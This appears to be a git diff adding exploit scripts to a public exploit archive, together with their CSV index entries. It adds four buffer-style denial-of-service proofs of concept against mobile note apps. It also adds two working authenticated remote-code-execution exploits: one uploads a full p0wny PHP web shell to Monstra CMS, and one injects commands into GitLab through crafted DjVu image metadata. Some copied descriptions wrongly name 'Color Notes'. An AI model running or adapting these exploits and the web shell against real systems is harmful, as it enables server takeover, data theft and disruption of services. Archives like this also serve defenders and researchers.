diff --git a/exploits/android/dos/49946.txt b/exploits/android/dos/49946.txt new file mode 100644 index 000000000..6434b7f5c --- /dev/null +++ b/exploits/android/dos/49946.txt @@ -0,0 +1,35 @@ +# Exploit Title: Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC) +# Date: 2021-06-03 +# Author: Brian Rodríguez +# Download Link: https://play.google.com/store/apps/details?id=com.workpail.inkpad.notepad.notes&hl=es_MX +# Version: 4.3.61 +# Category: DoS (Android) + +##### Vulnerability ##### + +InkPad Bloc de notas - Tareas is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against Android 8.0. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 50000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49952.py b/exploits/ios/dos/49952.py new file mode 100755 index 000000000..a131a0ad6 --- /dev/null +++ b/exploits/ios/dos/49952.py @@ -0,0 +1,35 @@ +# Exploit Title: Color Notes 1.4 - Denial of Service (PoC) +# Date: 06-04-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/gt/app/color-notes/id830515136 +# Version: 1.4 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: +f = open("payload.txt","w") +f.write(buffer) +f.close() +print ("File created") +except: +print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49953.py b/exploits/ios/dos/49953.py new file mode 100755 index 000000000..6f509fc40 --- /dev/null +++ b/exploits/ios/dos/49953.py @@ -0,0 +1,35 @@ +# Exploit Title: Macaron Notes great notebook 5.5 - Denial of Service (PoC) +# Date: 06-04-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/us/app/macaron-notes-great-notebook/id1079862221 +# Version: 5.5 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49954.py b/exploits/ios/dos/49954.py new file mode 100755 index 000000000..94d1838eb --- /dev/null +++ b/exploits/ios/dos/49954.py @@ -0,0 +1,35 @@ +# Exploit Title: My Notes Safe 5.3 - Denial of Service (PoC) +# Date: 06-04-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/us/app/my-notes-safe/id689971781 +# Version: 5.3 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/php/webapps/49949.py b/exploits/php/webapps/49949.py new file mode 100755 index 000000000..d92fdb924 --- /dev/null +++ b/exploits/php/webapps/49949.py @@ -0,0 +1,101 @@ +# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (Authenticated) +# Date: 03.06.2021 +# Exploit Author: Ron Jost (hacker5preme) +# Vendor Homepage: https://monstra.org/ +# Software Link: https://monstra.org/monstra-3.0.4.zip +# Version: 3.0.4 +# Tested on: Ubuntu 20.04 +# CVE: CVE-2018-6383 +# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-6383-Exploit + +''' +Description: +Monstra CMS through 3.0.4 has an incomplete "forbidden types" list that excludes .php (and similar) file extensions +but not the .pht or .phar extension, which allows remote authenticated Admins or Editors to execute arbitrary PHP code + by uploading a file, a different vulnerability than CVE-2017-18048. +''' + + +''' +Import required modules: +''' +import argparse +import requests + + +''' +User-Input: +''' +my_parser = argparse.ArgumentParser(description='Exploit for CVE-2018-6383') +my_parser.add_argument('-T', type=str, help='Target IP') +my_parser.add_argument('-P', type=str, help='Target Port') +my_parser.add_argument("-U", type=str, help="Monstra CMS Path") +my_parser.add_argument('-u', type=str, help="Username") +my_parser.add_argument('-p', type=str, help='Password') +args = my_parser.parse_args() +target_ip = args.T +target_port = args.P +Monstracms_path = args.U +username = args.u +password = args.p + + +''' +Exploit: +''' +# Cookies: +session = requests.Session() +url = "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php' +cookies = session.get(url).cookies.get_dict() +value = cookies['PHPSESSID'] +cookies = { + "__atuvc": "9%7C22", + 'PHPSESSID': 'sga7s1jb0o3b7dlueh5soin8a9' +} + +# Construct authentication header: +headers = { + "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Accept-Language": "de,en-US;q=0.7,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "application/x-www-form-urlencoded", + "Origin": "http://" + target_ip, + "Connection": "close", + "Referer": "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php', + "Upgrade-Insecure-Requests": "1"} + +# Construct authentication body +body = { + "login": username, + "password": password, + "login_submit": "Log In"} +x = requests.post(url, headers=headers, cookies=cookies, data=body) + +# Construct Exploit link: +url = "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php?id=filesmanager' + +# Construct Exploit header: +header = { + "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Accept-Language": "de,en-US;q=0.7,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "multipart/form-data; boundary=---------------------------27822155982314896762160847658", + "Origin": "http://" + target_ip, + "Connection": "close", + "Referer": "http://" + target_ip + Monstracms_path + 'admin/index.php?id=filesmanager', + "Upgrade-Insecure-Requests": "1" +} + +# Construct Exploit data: +burp0_data = "-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"csrf\"\r\n\r\n1e71963993909d612c40962b401c556b70e9bb3c\r\n-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.phar\"\r\nContent-Type: application/octet-stream\r\n\r\n&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?>\n\n\n\n \n \n p0wny@shell:~#\n \n \n\n \n \n\n \n
\n
\n                
\n ___ ____ _ _ _ _ _ \n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ \n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| \n|_| |___/ \\____/ \n
\n
\n
\n \n
\n \n
\n
\n
\n \n\n\n\r\n-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"upload_file\"\r\n\r\nUpload\r\n-----------------------------27822155982314896762160847658--\r\n" + +# Exploit: +x = requests.post(url, headers=header, cookies=cookies, data=burp0_data) + +# Finish: +print('') +print('Please login in your webrowser and then open the following URL:') +print('File uploaded to: http://' + target_ip + ':' + target_port + Monstracms_path + 'public/uplaods/shell.phar') +print('') \ No newline at end of file diff --git a/exploits/ruby/webapps/49951.py b/exploits/ruby/webapps/49951.py new file mode 100755 index 000000000..45e2854a3 --- /dev/null +++ b/exploits/ruby/webapps/49951.py @@ -0,0 +1,99 @@ +# Exploit Title: Gitlab 13.10.2 - Remote Code Execution (Authenticated) +# Date: 04/06/2021 +# Exploit Author: enox +# Vendor Homepage: https://about.gitlab.com/ +# Software Link: https://gitlab.com/ +# Version: < 13.10.3 +# Tested On: Ubuntu 20.04 +# Environment: Gitlab 13.10.2 CE +# Credits: https://hackerone.com/reports/1154542 + +import requests +from bs4 import BeautifulSoup +import random +import os +import argparse + +parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE') +parser.add_argument('-u', help='Username', required=True) +parser.add_argument('-p', help='Password', required=True) +parser.add_argument('-c', help='Command', required=True) +parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True) +args = parser.parse_args() + +username = args.u +password = args.p +gitlab_url = args.t +command = args.c + +session = requests.Session() + +# Authenticating +print("[1] Authenticating") +r = session.get(gitlab_url + "/users/sign_in") +soup = BeautifulSoup(r.text, features="lxml") +token = soup.findAll('meta')[16].get("content") + +login_form = { + "authenticity_token": token, + "user[login]": username, + "user[password]": password, + "user[remember_me]": "0" +} +r = session.post(f"{gitlab_url}/users/sign_in", data=login_form) + +if r.status_code != 200: + exit(f"Login Failed:{r.text}") +else: + print("Successfully Authenticated") + + +# payload creation +print("[2] Creating Payload ") + +payload = f"\" . qx{{{command}}} . \\\n" +f1 = open("/tmp/exploit","w") +f1.write('(metadata\n') +f1.write(' (Copyright "\\\n') +f1.write(payload) +f1.write('" b ") )') +f1.close() + +# Checking if djvumake is installed +check = os.popen('which djvumake').read() +if (check == ""): + exit("djvumake not installed. Install by running command : sudo apt install djvulibre-bin") + +# Building the payload +os.system('djvumake /tmp/exploit.jpg INFO=0,0 BGjp=/dev/null ANTa=/tmp/exploit') + + +# Uploading it +print("[3] Creating Snippet and Uploading") + +# Getting the CSRF token +r = session.get(gitlab_url + "/users/sign_in") +soup = BeautifulSoup(r.text, features="lxml") +csrf = soup.findAll('meta')[16].get("content") + + +cookies = {'_gitlab_session': session.cookies['_gitlab_session']} +headers = { + 'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);', + 'Accept': 'application/json', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Referer': f'{gitlab_url}/projects', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + 'X-Requested-With': 'XMLHttpRequest', + 'X-CSRF-Token': f'{csrf}' +} +files = {'file': ('exploit.jpg', open('/tmp/exploit.jpg', 'rb'), 'image/jpeg', {'Expires': '0'})} + +r = session.post(gitlab_url+'/uploads/user', files=files, cookies=cookies, headers=headers, verify=False) + +if r.text != "Failed to process image\n": + exit("[-] Exploit failed") +else: + print("[+] RCE Triggered !!") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b72ed94b7..6c6259f25 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6789,6 +6789,10 @@ id,file,description,date,author,type,platform,port 49939,exploits/android/dos/49939.py,"ColorNote 4.1.9 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android, 49940,exploits/android/dos/49940.py,"Notepad notes 2.6.7 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android, 49941,exploits/android/dos/49941.py,"Blacknote 2.2.1 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android, +49946,exploits/android/dos/49946.txt,"Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC)",2021-06-04,"Brian Rodriguez",dos,android, +49952,exploits/ios/dos/49952.py,"Color Notes 1.4 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios, +49953,exploits/ios/dos/49953.py,"Macaron Notes great notebook 5.5 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios, +49954,exploits/ios/dos/49954.py,"My Notes Safe 5.3 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -44107,3 +44111,5 @@ id,file,description,date,author,type,platform,port 49943,exploits/php/webapps/49943.txt,"FUDForum 3.1.0 - 'author' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php, 49944,exploits/ruby/webapps/49944.py,"Gitlab 13.9.3 - Remote Code Execution (Authenticated)",2021-06-03,enox,webapps,ruby, 49945,exploits/php/webapps/49945.txt,"4Images 1.8 - 'redirect' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php, +49949,exploits/php/webapps/49949.py,"Monstra CMS 3.0.4 - Remote Code Execution (Authenticated)",2021-06-04,"Ron Jost",webapps,php, +49951,exploits/ruby/webapps/49951.py,"Gitlab 13.10.2 - Remote Code Execution (Authenticated)",2021-06-04,enox,webapps,ruby,